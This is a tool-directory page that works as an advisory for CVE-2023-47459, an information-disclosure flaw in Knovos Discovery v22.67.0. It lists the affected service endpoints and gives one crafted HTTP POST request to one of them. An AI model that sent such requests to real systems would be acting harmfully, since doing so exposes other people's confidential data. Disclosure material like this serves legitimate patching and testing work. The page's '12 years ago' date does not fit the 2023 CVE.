Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2023-47459 — Proof-of-concept exploit for CVE-2023-47459, an information disclosure vulnerability in Knovos Discovery v22.67.0, demonstrating remote access to confidential data via crafted HTTP requests. | Kitploit
Tools/GitHubGitHub/aleksey-vi/cve-2023-47459
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHubaleksey-vi/cve-2023-47459

CVE-2023-47459

Proof-of-concept exploit for CVE-2023-47459, an information disclosure vulnerability in Knovos Discovery v22.67.0, demonstrating remote access to confidential data via crafted HTTP requests.

View Repository
12 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2023-47459

Description

A vulnerability was discovered in Knovos Discovery v.22.67.0 that allows a remote attacker to access confidential information using the components:
/DiscoveryReview/Service/CaseManagement.svc/GetProductSiteName, /DiscoveryReview/Service/WorkProduct.svc/BindRelatedDocumentsInformation and /DiscoveryProcess/Service/Admin.svc/getReviewIdForReport.

Vulnerability Type

Stack trace / Information Disclosure

Vendor of Product

Knovos Discovery

Affected Product Code Base

Version 22.67.0 - Version 22.67.0

Affected Component

/DiscoveryReview/Service/CaseManagement.svc/GetProductSiteName /DiscoveryReview/Service/WorkProduct.svc/BindRelatedDocumentsInformation /DiscoveryProcess/Service/Admin.svc/getReviewIdForReport

Attack Type

Remote

Impact Code execution

true

Impact Information Disclosure

true

Discoverer

  • Aleksey Vistorobskiy

Attack Vectors

authorized user

POST /DiscoveryReview/Service/WorkProduct.svc/BindRelatedDocumentsInformation HTTP/1.1
Host: vuln_host
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Content-Type: application/json; charset=utf-8
X-Requested-With: XMLHttpRequest
Content-Length: 17
Connection: close

{
	"Id": id
}

Reference

  • https://www.knovos.com/
  • https://github.com/aleksey-vi/CVE-2023-47459
Download Tool